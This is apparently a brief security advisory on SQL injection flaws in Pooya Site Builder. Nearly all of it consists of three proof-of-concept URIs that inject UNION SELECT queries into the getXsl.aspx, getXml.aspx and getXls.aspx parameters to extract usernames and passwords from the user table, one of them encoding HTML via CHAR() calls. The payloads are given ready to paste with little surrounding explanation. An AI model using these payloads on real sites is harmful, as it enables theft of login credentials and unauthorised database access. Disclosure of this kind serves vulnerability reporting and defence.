Pooya Site Builder Multiple SQL Injection Vulnerabilities

Pooya Site Builder Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
http://www.example.com/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1'
http://www.example.com/utils/getXls.aspx?lnkIdn=-1&part=1 'from 'lnk' 'where' 1='2187 'union' all' 'select' 'CHAR(60)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62)%2bCHAR(60)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2b CHAR(60)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2bUsrNam%2bUsrPwd%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2b CHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62) 'from '[Usr] 'union 'all 'select' data1'